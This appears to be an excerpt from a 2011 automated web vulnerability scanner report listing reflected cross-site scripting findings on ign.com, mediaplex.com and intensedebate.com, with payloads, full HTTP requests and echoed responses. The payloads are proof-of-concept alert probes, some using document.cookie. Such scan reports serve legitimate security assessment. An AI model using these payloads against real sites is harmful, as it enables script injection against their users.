The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9547b"-alert(1)-"6cf3d46568c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9547b"-alert(1)-"6cf3d46568c=1 HTTP/1.1 Host: ie.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfcaa"><script>alert(1)</script>43aa4845d3e was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-10%3Fmpt%3D54455098227695094bfcaa"><script>alert(1)</script>43aa4845d3e&mpt=54455098227695094&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D54455098227695094%2526mt_id%253D109283%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253D HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045786912&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F27 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:29:41 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 20:09:33 GMT ETag: "6fdb24-d8d-499473254f940" Accept-Ranges: bytes Content-Length: 7231 Content-Type: text/html; charset=ISO-8859-1
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92342"%3balert(1)//3291cec59b was submitted in the mpck parameter. This input was echoed as 92342";alert(1)//3291cec59b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-10%3Fmpt%3D5445509822769509492342"%3balert(1)//3291cec59b&mpt=54455098227695094&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D54455098227695094%2526mt_id%253D109283%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253D HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045786912&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F27 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:29:43 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 20:09:33 GMT ETag: "6fdb24-d8d-499473254f940" Accept-Ranges: bytes Content-Length: 7031 Content-Type: text/html; charset=ISO-8859-1
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97521"%3balert(1)//4a20a6ea1b4 was submitted in the mpvc parameter. This input was echoed as 97521";alert(1)//4a20a6ea1b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-10%3Fmpt%3D54455098227695094&mpt=54455098227695094&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D54455098227695094%2526mt_id%253D109283%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253D97521"%3balert(1)//4a20a6ea1b4 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045786912&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F27 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:29:47 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 20:09:33 GMT ETag: "6fdb24-d8d-499473254f940" Accept-Ranges: bytes Content-Length: 7021 Content-Type: text/html; charset=ISO-8859-1
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e6f1"><script>alert(1)</script>39ec161d3fb was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-10%3Fmpt%3D54455098227695094&mpt=54455098227695094&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D54455098227695094%2526mt_id%253D109283%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253D4e6f1"><script>alert(1)</script>39ec161d3fb HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045786912&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F27 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:29:45 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 20:09:33 GMT ETag: "6fdb24-d8d-499473254f940" Accept-Ranges: bytes Content-Length: 7231 Content-Type: text/html; charset=ISO-8859-1
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab852"><script>alert(1)</script>99d91a9601e was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-11%3Fmpt%3D55758597716581794ab852"><script>alert(1)</script>99d91a9601e&mpt=55758597716581794&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D55758597716581794%2526mt_id%253D109284%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253D HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045702914&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:28:17 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 19:10:35 GMT ETag: "4c7666-d83-499465f7360c0" Accept-Ranges: bytes Content-Length: 7221 Content-Type: text/html; charset=ISO-8859-1
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dad48"%3balert(1)//0f2369ad7c6 was submitted in the mpck parameter. This input was echoed as dad48";alert(1)//0f2369ad7c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-11%3Fmpt%3D55758597716581794dad48"%3balert(1)//0f2369ad7c6&mpt=55758597716581794&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D55758597716581794%2526mt_id%253D109284%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253D HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045702914&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:28:19 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 19:10:35 GMT ETag: "4c7666-d83-499465f7360c0" Accept-Ranges: bytes Content-Length: 7035 Content-Type: text/html; charset=ISO-8859-1
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b74d"%3balert(1)//13606830cfa was submitted in the mpvc parameter. This input was echoed as 3b74d";alert(1)//13606830cfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-11%3Fmpt%3D55758597716581794&mpt=55758597716581794&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D55758597716581794%2526mt_id%253D109284%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253D3b74d"%3balert(1)//13606830cfa HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045702914&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:28:25 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 19:10:35 GMT ETag: "4c7666-d83-499465f7360c0" Accept-Ranges: bytes Content-Length: 7011 Content-Type: text/html; charset=ISO-8859-1
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8664"><script>alert(1)</script>402fe2e856b was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17339-119294-3601-11%3Fmpt%3D55758597716581794&mpt=55758597716581794&mpvc=http://pixel.mathtag.com/click/img%253Fmt_aid%253D55758597716581794%2526mt_id%253D109284%2526mt_adid%253D100376%2526mt_uuid%253D4d3702bc-839e-0690-5370-3c19a9561295%2526redirect%253Df8664"><script>alert(1)</script>402fe2e856b HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045702914&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 02:28:23 GMT Server: Apache Last-Modified: Fri, 07 Jan 2011 19:10:35 GMT ETag: "4c7666-d83-499465f7360c0" Accept-Ranges: bytes Content-Length: 7221 Content-Type: text/html; charset=ISO-8859-1
1.253. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://insider.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ebc7"-alert(1)-"062695013bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5ebc7"-alert(1)-"062695013bc=1 HTTP/1.1 Host: insider.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Insider: Premi ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://insider.ign.com/?5ebc7"-alert(1)-"062695013bc=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.254. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://insider.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a4ca"><script>alert(1)</script>7ce259de827 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8a4ca"><script>alert(1)</script>7ce259de827=1 HTTP/1.1 Host: insider.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66cae'><script>alert(1)</script>dcb28d609a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/getCommentCounts.php66cae'><script>alert(1)</script>dcb28d609a3?src=wp-2&acct=847fca0ae90336fffd5b60f6203a91c0&ids=170683|170617|170255|170590|170511|170141|170427|170464|170674|170369|170354|170367|170327|170303|169789|170162|&guids=http%253A%252F%252Fthechive.com%252F%253Fp%253D170683|http%253A%252F%252Fthechive.com%252F%253Fp%253D170617|http%253A%252F%252Fthechive.com%252F%253Fp%253D170255|http%253A%252F%252Fthechive.com%252F%253Fp%253D170590|http%253A%252F%252Fthechive.com%252F%253Fp%253D170511|http%253A%252F%252Fthechive.com%252F%253Fp%253D170141|http%253A%252F%252Fthechive.com%252F%253Fp%253D170427|http%253A%252F%252Fthechive.com%252F%253Fp%253D170464|http%253A%252F%252Fthechive.com%252F%253Fp%253D170674|http%253A%252F%252Fthechive.com%252F%253Fp%253D170369|http%253A%252F%252Fthechive.com%252F%253Fp%253D170354|http%253A%252F%252Fthechive.com%252F%253Fp%253D170367|http%253A%252F%252Fthechive.com%252F%253Fp%253D170327|http%253A%252F%252Fthechive.com%252F%253Fp%253D170303|http%253A%252F%252Fthechive.com%252F%253Fp%253D169789|http%253A%252F%252Fthechive.com%252F%253Fp%253D170162|&links=http%3A%2F%2Fthechive.com%2F2011%2F02%2F05%2Ffirst-ever-aerial-footage-of-uncontacted-amazon-tribe-released%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fbest-photos-of-the-week-50-photos-24%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fdaily-afternoon-randomness-in-hq-33-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fbest-links-on-the-internet-259%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fthere-are-sexy-chivers-among-us-64-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fwhoever-said-pro-wrestling-was-fake-didnt-watch-this-condensed-version%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fuseless-friday-facts-10-photos-2%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Feverybodys-least-favorite-house-guest-scumbag-steve-30-photos%2F|http%3A%2F%2Ftheberry.com%2F2011%2F02%2F04%2Fdo-not-apologize-for-awesomeness-30-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fball-girls-are-the-poor-mans-sexy-tennis-star-28-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fmove-over-nasa-11-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Funder-boob-is-my-personal-renewable-energy-source-24-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Ffound-rare-photos-of-the-wright-brothers-inventing-that-thing-that-we-take-for-granted-24-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Ftoothpicks-man-wtf-not-20-photos%2F|http%3A%2F%2Fthebrigade.com%2F2011%2F02%2F04%2Fthis-is-our-weekend-28-photos%2F|http%3A%2F%2Fthechive.com%2F2011%2F02%2F04%2Fits-friday-you-could-use-some-photobombs-31-photos-5%2F|&titles=First%2Bever%2Baerial%2Bfootage%2Bof%2Buncontacted%2BAmazon%2Btribe%2Breleased%2B%2528video%2529|Best%2Bphotos%2Bof%2Bthe%2Bweek%2B%252850%2BPhotos%2529|Daily%2BAfternoon%2BRandomness%2Bin%2BHQ%2B%252833%2BPhotos%2529|Best%2Blinks%2Bon%2Bthe%2Binternet|There%2Bare%2BSexy%2BChivers%2BAmong%2BUs%2B%252864%2BPhotos%2529|Whoever%2Bsaid%2Bpro%2Bwrestling%2Bwas%2Bfake%2Bdidn%2527t%2Bwatch%2Bthis%2B%2528short%2Bversion%2529|Friday%2Bfacts%2Bfit%2Bfor%2Ban%2Bobtuse%2Bking%2B%252810%2BPhotos%2529|Everybody%2527s%2Bleast%2Bfavorite%2Bhouse%2Bguest%252C%2BScumbag%2BSteve%2B%252830%2BPhotos%2529|theBERRY%253A%2BDo%2Bnot%2Bapologize%2Bfor%2BAWESOMENESS%2B%252830%2Bphotos%2529|Ball%2Bgirls%2Bare%2Bthe%2Bpoor%2Bman%2527s%2Bsexy%2Btennis%2Bstar%2B%252828%2BPhotos%2529|Move%2Bover%2BNASA%2B%252811%2Bphotos%2529%2B|Under-boob%2Bis%2Bmy%2Bpersonal%2Brenewable%2Benergy%2Bsource%2B%252824%2Bphotos%2529|Found%2521%2BRare%2Bphotos%2Bof%2Bthe%2BWright%2BBrothers%2Binventing%2Bthat%2Bthing%2Bthat%2Bwe%2Btake%2Bfor%2Bgranted%2B%252824%2Bphotos%2529|Toothpicks%252C%2Bman.%2BWTF%2Bnot%253F%2B%252820%2BPhotos%2529|theBRIGADE%253A%2BFirepower%2BAfternoon%2BRandomness%2B%252829%2BHQ%2BPhotos%2529|It%2527s%2BFriday%252C%2Byou%2Bcould%2Buse%2Bsome%2Bphotobombs%2B%252831%2BPhotos%2529|&authors=Leo|Bob|John|Bob|John|Bob|Bob|John|Emily|Bob|Leo|Leo|Leo|Bob|Rick|John|×=2011-02-05%2B19%253A31%253A40|2011-02-05%2B06%253A00%253A54|2011-02-04%2B22%253A01%253A24|2011-02-04%2B22%253A00%253A38|2011-02-04%2B19%253A55%253A32|2011-02-04%2B19%253A45%253A41|2011-02-04%2B19%253A08%253A44|2011-02-04%2B18%253A47%253A24|2011-02-04%2B18%253A00%253A08|2011-02-04%2B17%253A28%253A01|2011-02-04%2B17%253A18%253A31|2011-02-04%2B17%253A15%253A29|2011-02-04%2B17%253A09%253A41|2011-02-04%2B16%253A33%253A40|2011-02-04%2B16%253A02%253A18|2011-02-04%2B15%253A00%253A41| HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://thechive.com/?ign105ab01%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E958cbd566d4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Feb 2011 02:25:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 9156
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.php66cae'><script>alert(1)</script>dcb28d609a3?src=wp-2&acct=847fca0ae90336fffd5b60f6203a91c0&ids=170683|170617|170255|170590|170511|170141|170427|170464|170674|170369|170354|170367|170327|170303|169789|170162|&guids=http%253A%252F%252Fthechive.co ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a4ba'><script>alert(1)</script>16e6c3b3bc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/wordpressTemplateLinkWrapper2.php1a4ba'><script>alert(1)</script>16e6c3b3bc0?acct=847fca0ae90336fffd5b60f6203a91c0 HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://thechive.com/?ign105ab01%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E958cbd566d4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Feb 2011 02:25:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php1a4ba'><script>alert(1)</script>16e6c3b3bc0?acct=847fca0ae90336fffd5b60f6203a91c0'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 670de'><script>alert(1)</script>ed9dfd6b861 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
